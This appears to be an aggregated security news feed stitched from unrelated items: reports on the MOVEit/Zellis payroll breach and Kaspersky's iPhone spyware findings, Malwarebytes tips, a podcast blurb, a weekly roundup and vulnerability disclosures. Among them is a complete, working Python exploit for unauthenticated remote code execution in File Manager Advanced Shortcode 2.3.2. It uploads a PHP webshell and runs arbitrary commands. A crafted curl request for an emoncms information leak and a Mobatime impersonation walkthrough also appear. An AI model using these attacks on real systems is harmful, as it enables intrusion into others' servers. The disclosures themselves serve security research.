By Waqas
Reportedly, the hackers gained unauthorized access to sensitive data by exploiting a backdoor in MOVEit, a file transfer software used by Zellis.
This is a post from HackRead.com Read the original post: British Airways, BBC and Boots Hit by Suspected Russian Cyber Attack

British Airways has already informed 34,000 UK employees about the massive cyber attack, while the BBC has also acknowledged the incident.

In a shocking revelation, it has been uncovered that tens of thousands of employees from prominent UK companies, including British Airways (BA), the British Broadcasting Corporation (BBC), and Boots, may have fallen victim to a large-scale data breach suspected to be linked to a cyber attack originating from Russia.

The breach, which has raised serious concerns over cybersecurity, has reportedly exposed the personal information of affected individuals.

The alarming incident came to light after BA issued a warning to its 34,000-strong workforce, notifying them of a significant “cybersecurity incident” resulting in the disclosure of personal data belonging to employees paid through BA’s payroll systems in the UK and Ireland.

The compromised information encompasses a range of sensitive details, including names, addresses, national insurance numbers, banking information, and other personal records. What’s worse, British Airways was also a victim of a data breach in 2018, during which the personal and financial details of 380,000 of its customers were stolen.

Sources indicate that the breach is associated with Zellis, BA’s payroll provider and other firms in collaboration with the company have also fallen victim to the attack. Boots, a well-known UK pharmacy chain, sent out emails to its employees, informing them that their names, surnames, employee numbers, dates of birth, email addresses, and partial home addresses have been affected. It is believed that a small fraction of Boots employees may have had additional data compromised as well.

The BBC, a renowned broadcasting institution, has also confirmed its involvement in the breach. A spokesperson for the organization stated that they were aware of the data breach at Zellis, their third-party supplier, and are actively cooperating with them to investigate the extent of the incident. Emphasizing the significance of data security, the spokesperson reassured that the BBC is following established reporting procedures to address the issue.

Zellis, which provides payroll services to numerous major companies, including the National Health Service (NHS) and Jaguar Land Rover, has reportedly suffered a breach affecting eight of its clients.

According to local British media reports, the cyber attack is suspected to be the work of a Russian-speaking cybercrime gang known as Cl0p, as noted by security researchers.

Reportedly, the hackers gained unauthorized access to sensitive data by exploiting a backdoor in MOVEit, a file transfer software used by Zellis.

MOVEit’s vulnerability was first identified by its creator, Progress Software, which promptly alerted its customers, urging them to take immediate action by deleting any unauthorized user accounts created by the hackers.

Rafe Pilling, a principal researcher at Secureworks, a cybersecurity company, disclosed that the Cl0p ransomware gang has been actively targeting vulnerable servers recently. He expressed that his team is currently engaged in multiple incident response tasks associated with this particular hack, strongly suggesting a link between the attacks on BA and Boots.

Zellis has assured the public that it is actively assisting the affected customers and has taken swift action in response to the incident. Upon becoming aware of the breach, Zellis disconnected the server utilizing the compromised MOVEit software and engaged an external security incident response team for forensic analysis and ongoing monitoring.

The Information Commissioner’s Office (ICO), Data Protection Commission (DPC), and the National Cyber Security Centre (NCSC) in both the UK and Ireland have been notified.

BA has stated that the breach was a result of a previously unknown vulnerability in the widely used MOVEit file transfer tool, supplied by Zellis. The company has reached out to affected individuals, offering support and guidance in light of the compromised personal information.

Progress Software has also acknowledged the situation, confirming their investigation into the vulnerability in MOVEit Transfer and MOVEit Cloud. The company promptly alerted customers, implemented immediate mitigation steps, disabled web access to MOVEit Cloud, and developed a security patch to address the vulnerability within 48 hours.

They further asserted their collaboration with leading cybersecurity experts to thoroughly investigate the incident and ensure appropriate response measures are taken.

As the affected companies grapple with the aftermath of this significant data breach, authorities like the ICO continue to assess the information provided, aiming to ensure the protection of individuals’ data and hold responsible parties accountable.

The incident serves as a stark reminder of the growing cybersecurity threats faced by both corporations and individuals in an increasingly interconnected world.

**RELATED ARTICLES**

1.  UK’s Retail Giant WH Smith Cyberattack
2.  Media Giant Guardian Hit By Ransomware Attack
3.  UK Criminal Records Office Hit by Ransomware Attack

British Airways, BBC and Boots Hit by Suspected Russian Cyber Attack

File Manager Advanced Shortcode version 2.3.2 suffers from a remote code execution vulnerability.

    # Exploit Title: File Manager Advanced Shortcode 2.3.2 - Unauthenticated Remote Code Execution (RCE)# Date: 05/31/2023# Exploit Author: Mateus Machado Tesser# Vendor Homepage: https://advancedfilemanager.com/# Version: File Manager Advanced Shortcode 2.3.2# Tested on: Wordpress 6.1 / Linux (Ubuntu) 5.15# CVE: CVE-2023-2068import requestsimport jsonimport pprintimport sysimport rePROCESS = "\033[1;34;40m[*]\033[0m"SUCCESS = "\033[1;32;40m[+]\033[0m"FAIL = "\033[1;31;40m[-]\033[0m"try:  COMMAND = sys.argv[2]  IP = sys.argv[1]  if len(COMMAND) > 1:    pass  if IP:    pass  else:    print(f'Use: {sys.argv[0]} IP COMMAND')except:  passurl = 'http://'+IP+'/' # Path to File Manager Advanced Shortcode Panelprint(f"{PROCESS} Searching fmakey")try:  r = requests.get(url)  raw_fmakey = r.text  fmakey = re.findall('_fmakey.*$',raw_fmakey,re.MULTILINE)[0].split("'")[1]  if len(fmakey) == 0:    print(f"{FAIL} Cannot found fmakey!")except:  print(f"{FAIL} Cannot found fmakey!")print(f'{PROCESS} Exploiting Unauthenticated Remote Code Execution via AJAX!')url = "http://"+IP+"/wp-admin/admin-ajax.php"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryI52DGCOt37rixRS1", "Accept": "*/*"}data = "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hashes[l1_cG5nLWNsaXBhcnQtaGFja2VyLWhhY2tlci5wbmc]\"\r\n\r\nexploit.php\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nfma_load_shortcode_fma_ui\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"_fmakey\"\r\n\r\n"+fmakey+"\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path\"\r\n\r\n\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"url\"\r\n\r\n\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"w\"\r\n\r\nfalse\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"r\"\r\n\r\ntrue\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide\"\r\n\r\nplugins\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"operations\"\r\n\r\nupload,download\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"path_type\"\r\n\r\ninside\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"hide_path\"\r\n\r\nno\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"enable_trash\"\r\n\r\nno\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_allow\"\r\n\r\ntext/x-php\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload_max_size\"\r\n\r\n2G\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"exploit2.php\"\r\nContent-Type: text/x-php\r\n\r\n<?php system($_GET['cmd']);?>\r\n"data += "------WebKitFormBoundaryI52DGCOt37rixRS1\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n\r\n------WebKitFormBoundaryI52DGCOt37rixRS1--\r\n"r = requests.post(url, headers=headers, data=data)print(f"{PROCESS} Sending AJAX request to: {url}")if 'errUploadMime' in r.text:  print(f'{FAIL} Exploit failed!')  sys.exit()elif r.headers['Content-Type'].startswith("text/html"):  print(f'{FAIL} Exploit failed! Try to change _fmakey')  sys.exit(0)else:  print(f'{SUCCESS} Exploit executed with success!')exploited = json.loads(r.text)url = ""print(f'{PROCESS} Getting URL with webshell')for i in exploited["added"]:  url = i['url']print(f"{PROCESS} Executing '{COMMAND}'")r = requests.get(url+'?cmd='+COMMAND)print(f'{SUCCESS} The application returned ({len(r.text)} length):\n'+r.text)

File Manager Advanced Shortcode 2.3.2 Remote Code Execution

emoncms v11 and later was discovered to contain an information disclosure vulnerability which allows attackers to obtain the web directory path and other information leaked by the server via a crafted web request.

emoncms 11 and later version suffers from an information leakage vulnerability. An unauthorized attacker can obtain the web directory path and other information leaked by the server by constructing a special http request.

    curl 'http{s}://{IP}:{PORT}/user/login.json' -X POST -i   -H 'Content-Type: application/x-www-form-urlencoded' -H 'Accept: text/plain, */*; q=0.01' -H 'X-Requested-With: XMLHttpRequest' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36' -H 'Host: {IP}:{PORT}' -H 'Connection: Keep-alive'  -d 'password%5B%5D=1&referrer=&rememberme=1&username=1'

CVE-2023-33518: A bug leaked server web directory and other information · Issue #1856 · emoncms/emoncms

Categories: Personal
It’s time to shake off that special feeling, start lying, forget everything you’ve been told about passwords, spin up a million email addresses, and start throwing away computers for fun.



(Read more...)




The post 5 unusual cybersecurity tips that actually work appeared first on Malwarebytes Labs.

So, you’re on top of your software updates, you use a password manager, you’ve enabled two-factor authentication wherever you can, you’ve got BrowserGuard installed, and you’re running Malwarebytes Premium.

If you're doing all of that you're already winning at security. But you want more, because you know that security is a journey and not a destination, and, let’s face it, you’re reading an article about five unusual cybersecurity tips: You’re hooked.

It's time to innovate and get weird. It’s time to shake off that special feeling, start lying, forget everything you’ve been told about passwords, spin up a million email addresses, and start throwing away computers for fun.

It's time for five unusual cybersecurity tips that actually work:

**1\. Lie**

Generally speaking, the fewer pieces of data you hand out, the safer you are. If a site is asking for data you don't want to share, remember: Sometimes it's OK to lie.

If a site wants a phone number and you don't want them to call you, fake it. (00000000000 is surprisingly effective.) If the site won't accept your made up number, don't worry. Lists of fake numbers that look right for your country but don't work are a short Google search away. It works for other data too, even fake credit card numbers—you won't be able to buy anything with one, but neither will anyone who steals it.

**2\. Stop thinking you're special**

Everyone is a star in their own story, so when we unexpectedly get a message from a lonely young Russian lady who's recently moved to our town, a Nigerian Prince promises us riches, "Keanu Reeves" follows us on Instagram, or we stumble upon the crypto-opportunity of a lifetime, our exceptionalism can kick in.

If it happened to somebody else, we'd be sceptical, but when it happens to us...well, we had a feeling our luck was about to turn! Burst that bubble. If something looks too good to be true, it isn't because you're special, it’s because it IS too good to be true. Sorry.

**3\. Forget strong passwords**

For years you've been told to make unreadable passwords with a of mix uppercase letters, lowercase letters, and wacky characters. That is still important, but reusing passwords over and over again is actually _much_ worse than having lots of different, weaker, passwords.

If a thief can steal your password from anywhere, they will try to use it everywhere, and if the same password works everywhere, you've lost everything. Your goal should be to create a new password for each service you use. Focus on simply avoiding really awful passwords, like "password" or "12345", and save the unreadable passwords for things that really matter, like your bank.

**4\. Use endless email addresses**

Look at your inbox for a few minutes and you’ll probably start to wonder “how did _they_ get my email address?” In between the messages from friends and colleagues, and the newsletters you signed up for but never read, there is always a smattering of speculative nonsense from people who have no business using your email address.

One way of getting on top of that problem is to use different email address for each account you sign up for. Apple will do this for you with its Hide My Email feature, and if you use Gmail you can just add a "+" to the name part of your address followed by anything you like, e.g. john.doe+malwarebytes@gmail.com.

Each unique address should only get messages from the site where you used it. If any other sites use it, you know that your data has been leaked, stolen or sold. If that happens, block the email address and consider closing your account on that site.

**5\. Throw your computer away**

If you want to say super-safe, just browse the internet using a computer with no sensitive data on it, and throw it away when you've finished, simple!

OK, it sounds expensive, but you can do it for free with tools like Oracle's VirtualBox. Virtual Machines (VMs) are computers made of software instead of plastic, metal, and silicon, that run on your computer just like any other program. You can run Windows, your web browser of choice, and all your other favourite apps inside a VM, where they are totally isolated from your real computer.

Like trips to Vegas, whatever happens on a VM stays on a VM. And because VMs can be cloned, rolled back, or destroyed with a mouse click, if anything bad happens on yours you can simply trash it and start a new one.

If you've got an unusual cybersecurity tip, we'd love to hear it. Leave it in the comments below.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

5 unusual cybersecurity tips that actually work

Categories: Podcast
This week on Lock and Code, we ask whether AI can lie and whether companies and individuals are placing too much trust into tools like ChatGPT. 



(Read more...)




The post Trusting AI not to lie: The cost of truth: Lock and Code S04E12 appeared first on Malwarebytes Labs.

In May, a lawyer who was defending their client in a lawsuit against Columbia's biggest airline, Avianca, submitted a legal filing before a court in Manhattan, New York, that listed several previous cases as support for their main argument to continue the lawsuit.

But when the court reviewed the lawyer's citations, it found something curious: Several were entirely fabricated. 

The lawyer in question had gotten the help of another attorney who, in scrounging around for legal precedent to cite, utilized the "services" of ChatGPT. 

ChatGPT was wrong. So why do so many people believe it's always right? 

Today, on the Lock and Code podcast with host David Ruiz, we speak with Malwarebytes security evangelist Mark Stockley and Malwarebytes Labs editor-in-chief Anna Brading to discuss the potential consequences of companies and individuals embracing natural language processing tools—like ChatGPT and Google's Bard—as arbiters of truth. Far from being understood simply as chatbots that can produce remarkable mimicries of human speech and dialogue, these tools are becoming sources of truth for countless individuals, while also gaining attraction amongst companies that see artificial intelligence (AI) and large language models (LLM) as the future, no matter what industry they operate in. 

The future could look eerily similar to an earlier change in translation services, said Stockley, who witnessed the rapid displacement of human workers in favor of basic AI tools. The tools were far, far cheaper, but the quality of the translations—of the truth, Stockley said—was worse. 

> "That is an example of exactly this technology coming in and being treated as the arbiter of truth in the sense that there is a cost to how much truth we want."

Tune in today. 

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use. 

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

Trusting AI not to lie: The cost of truth: Lock and Code S04E12

Plus: Amazon’s Ring was ordered to delete algorithms, North Korea’s failed spy satellite, and a rogue drone “attack” isn’t what it seems.

Code hidden inside PC motherboards left millions of machines vulnerable to malicious updates, researchers revealed this week. Staff at security firm Eclypsium found code within hundreds of models of motherboards created by Taiwanese manufacturer Gigabyte that allowed an updater program to download and run another piece of software. While the system was intended to keep the motherboard updated, the researchers found that the mechanism was implemented insecurely, potentially allowing attackers to hijack the backdoor and install malware.

Elsewhere, Moscow-based cybersecurity firm Kaspersky revealed that its staff had been targeted by newly discovered zero-click malware impacting iPhones. Victims were sent a malicious message, including an attachment, on Apple’s iMessage. The attack automatically started exploiting multiple vulnerabilities to give the attackers access to devices, before the message deleted itself. Kaspersky says it believes the attack impacted more people than just its own staff. On the same day as Kaspersky revealed the iOS attack, Russia’s Federal Security Service, also known as the FSB, claimed thousands of Russians had been targeted by new iOS malware and accused the US National Security Agency (NSA) of conducting the attack. The Russian intelligence agency also claimed Apple had helped the NSA. The FSB did not publish technical details to support its claims, and Apple said it has never inserted a backdoor into its devices.

If that’s not enough encouragement to keep your devices updated, we’ve rounded up all the security patches issued in May. Apple, Google, and Microsoft all released important patches last month—go and make sure you're up to date.

And there’s more. Each week we round up the security stories we didn’t cover in depth ourselves. Click on the headlines to read the full stories. And stay safe out there.

Lina Khan, the chair of the US Federal Trade Commission, warned this week that the agency is seeing criminals using artificial intelligence tools to “turbocharge” fraud and scams. The comments, which were made in New York and first reported by Bloomberg, cited examples of voice-cloning technology where AI was being used to trick people into thinking they were hearing a family member’s voice.

Recent machine-learning advances have made it possible for people’s voices to be imitated with only a few short clips of training data—although experts say AI-generated voice clips can vary widely in quality. In recent months, however, there has been a reported rise in the number of scam attempts apparently involving generated audio clips. Khan said that officials and lawmakers “need to be vigilant early” and that while new laws governing AI are being considered, existing laws still apply to many cases.

In a rare admission of failure, North Korean leaders said that the hermit nation’s attempt to put a spy satellite into orbit didn’t go as planned this week. They also said the country would attempt another launch in the future. On May 31, the Chollima-1 rocket, which was carrying the satellite, launched successfully, but its second stage failed to operate, causing the rocket to plunge into the sea. The launch triggered an emergency evacuation alert in South Korea, but this was later retracted by officials.

The satellite would have been North Korea’s first official spy satellite, which experts say would give it the ability to monitor the Korean Peninsula. The country has previously launched satellites, but experts believe they have not sent images back to North Korea. The failed launch comes at a time of high tensions on the peninsula, as North Korea continues to try to develop high-tech weapons and rockets. In response to the launch, South Korea announced new sanctions against the Kimsuky hacking group, which is linked to North Korea and is said to have stolen secret information linked to space development.

In recent years, Amazon has come under scrutiny for lax controls on people’s data. This week the US Federal Trade Commission, with the support of the Department of Justice, hit the tech giant with two settlements for a litany of failings concerning children’s data and its Ring smart home cameras.

In one instance, officials say, a former Ring employee spied on female customers in 2017—Amazon purchased Ring in 2018—viewing videos of them in their bedrooms and bathrooms. The FTC says Ring had given staff “dangerously overbroad access” to videos and had a “lax attitude toward privacy and security.” In a separate statement, the FTC said Amazon kept recordings of kids using its voice assistant Alexa and did not delete data when parents requested it.

The FTC ordered Amazon to pay around $30 million in response to the two settlements and introduce some new privacy measures. Perhaps more consequentially, the FTC said that Amazon should delete or destroy Ring recordings from before March 2018 as well as any “models or algorithms” that were developed from the data that was improperly collected. The order has to be approved by a judge before it is implemented. Amazon has said it disagrees with the FTC, and it denies “violating the law,” but it added that the “settlements put these matters behind us.”

As companies around the world race to build generative AI systems into their products, the cybersecurity industry is getting in on the action. This week OpenAI, the creator of text- and image-generating systems ChatGPT and Dall-E, opened a new program to work out how AI can best be used by cybersecurity professionals. The project is offering grants to those developing new systems.

OpenAI has proposed a number of potential projects, ranging from using machine learning to detect social engineering efforts and producing threat intelligence to inspecting source code for vulnerabilities and developing honeypots to trap hackers. While recent AI developments have been faster than many experts predicted, AI has been used in the cybersecurity industry for several years—although many claims don’t necessarily live up to the hype.

The US Air Force is moving quickly on testing artificial intelligence in flying machines—in January, it tested a tactical aircraft being flown by AI. However, this week, a new claim started circulating: that during a simulated test, a drone controlled by AI started to “attack” and “killed” a human operator overseeing it, because they were stopping it from accomplishing its objectives.

“The system started realizing that while they did identify the threat, at times the human operator would tell it not to kill that threat, but it got its points by killing that threat,” said Colnel Tucker Hamilton, according to a summary of an event at the Royal Aeronautical Society, in London. Hamilton continued to say that when the system was trained to not kill the operator, it started to target the communications tower the operator was using to communicate with the drone, stopping its messages from being sent.

However, the US Air Force says the simulation never took place. Spokesperson Ann Stefanek said the comments were “taken out of context and were meant to be anecdotal.” Hamilton has also clarified that he “misspoke” and he was talking about a “thought experiment.”

Despite this, the described scenario highlights the unintended ways that automated systems could bend rules imposed on them to achieve the goals they have been set to achieve. Called specification gaming by researchers, other instances have seen a simulated version of _Tetris_ pause the game to avoid losing, and an AI game character killed itself on level one to avoid dying on the next level.

AI Is Being Used to ‘Turbocharge’ Scams

By Waqas
The researchers discovered the oldest traces of infection in 2019, and it is believed that the attack is still active.
This is a post from HackRead.com Read the original post: Kaspersky Reveals iPhones of Employees Infected with Spyware

According to Kaspersky, this is an ongoing investigation, and the perpetrators are yet to be determined.

The CEO of cybersecurity giant and antivirus vendor Kaspersky, Eugene Kaspersky, revealed in a blog post that dozens of iPhones used by their senior employees contained spyware capable of recording audio, capturing images from messaging apps, geolocation, and more.

The company noted that iOS devices on its WiFi network had become targets of threat actors who launched zero-day exploits as part of Operation Triangulation. The researchers discovered the oldest traces of infection in 2019, and it is believed that the attack is still active.

****How Was the Activity Discovered?****

Kaspersky researchers noted suspicious activity on several iPhones while monitoring network traffic for mobile devices on their corporate WiFi network through the KUMA (Kaspersky Unified Monitoring and Analysis) platform.

To investigate further, they created offline backups of these devices since they couldn’t inspect them from the inside and discovered an infection using the Mobile Verification Toolkit’s mvt-ios. This utility provides information about the sequence of events, allowing researchers to recreate the incident.

****Digging Deeper…****

The attack begins with iOS phone users receiving an iMessage with an attachment that contains the exploit. Upon clicking, it triggers a vulnerability that leads to code execution without involving user input, making it a zero-click attack.

The malicious code downloads new payloads after connecting with the C2 server, which can include privilege escalation exploits. The final payload is a feature-rich APT platform.

“The analysis of the final payload is not finished yet. The code is run with root privileges, implements a set of commands for collecting system and user information, and can run arbitrary code downloaded as plugin modules from the C&C server,” the researchers wrote in their blog post.

****Various Vulnerabilities Used to Get Deeper Access****

Multiple vulnerabilities are combined to allow attackers deeper access to the compromised device. Once the final payload is downloaded, the message and the malicious attachments initiate self-deletion. The malware cannot maintain persistence if the device is rebooted, but researchers observed reinfection in some samples.

The exact nature of the bugs used in this attack chain is unclear, but one of the flaws could be the kernel extension vulnerability (CVE-2022-46690) patched by Apple in December 2022.

****Apple’s Response****

Kaspersky’s findings were published the same day the Russian security services released a statement blaming the US for exploiting Apple devices to launch reconnaissance operations.

“Several thousand telephone sets of this brand were infected….. In addition to domestic subscribers, facts of infection of foreign numbers and subscribers using SIM cards registered with diplomatic missions and embassies in Russia, including the countries of the NATO bloc and the post-Soviet space, as well as Israel, SAR, and China, were revealed,” Russian intelligence claimed.

However, Apple’s spokesperson refuted these allegations, stating that none of their products have ever contained a backdoor, and Apple would never collaborate with governments.

Regarding Kaspersky’s report, Apple stated that the issue was detected in some versions of iPhones (iOS version 15.7 and below), whereas currently, iOS devices run version 16.5.

Patrick Wardle, an iOS and macOS security researcher, told Wired that Kaspersky remained hacked by an iOS zero-day exploit for five years, and the issue has been discovered now, indicating that it is pretty challenging to detect zero-day exploits.

Kaspersky noted that this difficulty is caused by iOS’s locked-down design, making it tough to inspect iOS’s activities. This is an ongoing investigation, and the perpetrators are yet to be determined. Stay tuned for an update…

**RELATED ARTICLES**

1.  Israel hacked Kaspersky Labs
2.  Kaspersky spots CIA malware
3.  US: Kaspersky is a national security threat
4.  WikiLeaks’ Vault 8: CIA Impersonated Kaspersky Lab
5.  Kaspersky Reveal How NSA Hacking Tools Were Stolen

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Kaspersky Reveals iPhones of Employees Infected with Spyware

Incorrect Authorization vulnerability in Mobatime web application allows Privilege Escalation, Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Mobatime web application: through 06.7.22.



This walkthrough presents another vulnerability discovered on the Mobatime web application (see CVE-2023-3032, same version 06.7.2022 affected). This vulnerability allows an authenticated user to impersonate another one, possibly having more privileges.

This application is essentially a single page, and the pieces of information are retrieved through AJAX calls. To get adequate pieces of information, the requests carry the user identifier, in order to fetch data related to them. The issue is that this identifier is controlled by the user, and the request body is not protected. It is therefore possible to change this identifier, and impersonate someone else.

A typical AJAX call is as follows:

    POST /Webengine/api/ajax_api.aspx HTTP/1.1 Accept: */*
    Accept-Encoding: gzip, deflate, br
    ... snipped ...
    Sec-GPC: 1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
    AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0
    Safari/537.36 X-Requested-With: XMLHttpRequest
    
    @64eyJhcnJheV9pbnQiOltdLCJmdW5jdGlvbiI6NTA3LCJpcGFyYW0xIjoxNTQsImlwYX
    JhbTEwIjowLCJpcGFyYW0xMSI6MCwiaXBhcmFtMTIiOjAsImlwYXJhbTEzIjowLCJpcGF
    yYW0xNCI6MCwiaXBhcmFtMTUiOjAsImlwYXJhbTIiOjg0MTUsImlwYXJhbTMiOjAsImlw
    YXJhbTQiOjAsImlwYXJhbTUiOjAsImlwYXJhbTYiOjAsImlwYXJhbTciOjAsImlwYXJhb
    TgiOjAsImlwYXJhbTkiOjAsImxwYXJhbTEiOjAsInBhcmFtMSI6IiIsInBhcmFtMiI6Ii
    IsInBhcmFtMyI6IiIsInBhcmFtNCI6IiIsInBhcmFtNSI6IiIsInRva2VuIjowfQ==
    

One can recognise here a base64-encoded JSON (prefix eyJ), which gives us, once decoded:

    {
        "array_int":[],
        "function":507,
        "iparam1":154,
        "iparam10":0,
        "iparam11":0,
        "iparam12":0,
        "iparam13":0,
        "iparam14":0,
        "iparam15":0,
        "iparam2":8415,
        "iparam3":0,
        "iparam4":0,
        "iparam5":0,
        "iparam6":0,
        "iparam7":0,
        "iparam8":0,
        "iparam9":0,
        "lparam1":0,
        "param1":"",
        "param2":"","
        param3":"",
        "param4":"",
        "param5":"",
        "token":0
    }
    

Now, let’s assume that our ID is 154, and that we want to impersonate 155. Keen eye may see that the payload is not signed, hence forgeable. Since the application is a singe page, it was likely that this value 154 was carried by a JS variable, and that we could change it in a single place. All subsequent AJAX calls would probably embed the modified ID, and make us act as 155.

**Hunting the identifier**

Analysing the traffic reveals that the AJAX requests originate from a call to the routine Get in the file MobaBridge3.js. One can suppose here that this routine probably deals with the JSON payload so as to authenticated the request:

A breakpoint was therefore put at line 1’316, before the function end. Refreshing the page reveals that the attribute this._param holds the value 154. It comes from the second argument (param). Since the value 154 was already known there, one can step over LaunchThread to get back to the calling routine ($ctor1).

In this routine, a call to Get is indeed performed, and the second argument containing the identifier is referred to as s. The variable s is obtained thanks to a call to JsonConvert.SerializeObject, hence was likely to be built based on the variable function (line 17). The latter is passed as argument (line 13), and to analyse it, one should once again climb up the calling stack.

The caller lies in the class MensualView.cs, where the func variable is initialised (passed as function). It is worth noting that one of the attributes of func is named iparam1, just like the attribute carrying the identifier in the JSON stream. Its value is held by the attribute Workflow.pid. By looking where such variable is set thanks to a regular expression, only two results are returned. One of them lies on the class LoginLinkWorkflow.cs

By putting a breakpoint at line 139 and refreshing the page, the breakpoint is hit. The value of the variable PId could be turn into 155, and letting the execution flow continue normally, and the page would be rendered as if we were 155.

**Conclusion**

Since only the advertised identifier seems to be used to verify the authorisations, a malicious user could trick the application into thinking that they are someone else by changing their ID on the client side. Since the server trusts this ID, they would serve inappropriate content. The server should use server-side variables to store the ID of a user, based on a session identifier. An alternative could make use of signed JWTs to make them inalterable.

*   **2023** 6
*   **2020** 12

**2023**

**CVE-2023-3033**

3 minute read

This walkthrough presents another vulnerability discovered on the Mobatime web application (see CVE-2023-3032, same version 06.7.2022 affected). This vulnera...

**CVE-2023-3032**

less than 1 minute read

Mobatime offers various time-related products, such as check-in solutions. In versions up to 06.7.2022, an arbitrary file upload allowed an authenticated use...

**CVE-2023-3031**

less than 1 minute read

King-Avis is a Prestashop module developed by Webbax. In versions older than 17.3.15, the latter suffers from an authenticated path traversal, leading to loc...

**FuckFastCGI made simpler**

3 minute read

Let’s render unto Caesar the things that are Caesar’s, the exploit FuckFastCGI is not mine and is a brilliant one, bypassing open\_basedir and disable\_functio...

**PHP .user.ini risks**

4 minute read

I have to admit, PHP is not my favourite, but such powerful language sometimes really amazes me. Two days ago, I found a bypass of the directive open\_basedir...

**PHP open\_basedir bypass**

3 minute read

PHP is a really powerful language, and as a wise man once said, with great power comes great responsibilities. There is nothing more frustrating than obtaini...

Back to Top ↑

**2020**

**Self modifying C program - Polymorphic**

17 minute read

A few weeks ago, a good friend of mine asked me if it was possible to create such a program, as it could modify itself. After some thoughts, I answered that ...

Back to Top ↑

CVE-2023-3033: CVE-2023-3033

On the same day, Russia’s FSB intelligence service launched wild claims of NSA and Apple hacking thousands of Russians.

The Moscow-based cybersecurity firm Kaspersky has made headlines for years by exposing sophisticated hacking by Russian and Western state-sponsored cyberspies alike. Now it’s exposing a stealthy new intrusion campaign where Kaspersky itself was a target.

In a report published today, Kaspersky said that at the beginning of the year, it detected targeted attacks against a group of iPhones after analyzing the company’s own corporate network traffic. The campaign, which the researchers call Operation Triangulation and say is “ongoing,” appears to date back to 2019 and utilized multiple vulnerabilities in Apple’s iOS mobile operating system to let attackers take control of victim devices.

Kaspersky says the attack chain utilized “zero-click” exploitation to compromise targets’ devices by simply sending a specially crafted message to victims over Apple’s iMessage service. Victims received the message, which included a malicious attachment, and exploitation would begin whether victims opened the message and inspected the attachment or not. Then the attack would chain together multiple vulnerabilities to give the hackers deeper and deeper access to the target’s device. And the final malware payload would automatically download to the victim’s device before the original malicious message and attachment self-deleted.

Kaspersky’s revelation of the new iOS hacking campaign comes on the same day that Russia’s FSB intelligence service separately announced a claim that the US National Security Agency has hacked thousands of Russians’ phones. Even more remarkably, the FSB claimed that Apple had participated in that broad hacking of iOS devices, willingly providing vulnerabilities to the NSA to exploit in its spying operations.

Apple said in a statement to WIRED, “We have never worked with any government to insert a backdoor into any Apple product and never will.”

When asked about Kaspersky’s report, an Apple spokesperson noted that the findings only appear to pertain to iPhones running iOS version 15.7 and below. The current version of iOS is 16.5.

Kaspersky says that the malware it discovered cannot persist on a device once it is rebooted, but the researchers say they saw evidence of reinfection in some cases. The exact nature of the vulnerabilities used in the exploit chain remains unclear, though Kaspersky says that one of the flaws was likely the kernel extension vulnerability CVE-2022-46690 that Apple patched in December. 

Zero-click vulnerabilities can exist on any platform, but in recent years, attackers and spyware vendors have focused on finding these flaws in Apple’s iOS, often in iMessage, and exploiting them to launch targeted attacks on iPhones. This is partly because services like iMessage present unusually fertile ground within iOS for discovering vulnerabilities, but also because attacks on iOS devices with this approach are often very difficult for victims to detect.

“Kaspersky, arguably one of the best exploit detection companies in the world, was potentially hacked via an iOS zero-day for five years, and it was only discovered now,” says longtime macOS and iOS security researcher Patrick Wardle. “That shows how ridiculously hard it is to detect these exploits and attacks.”

In their report, the Kaspersky researchers point out that one of the reasons for this difficulty is iOS’s locked-down design, which makes it very tough to inspect the operating system’s activity.

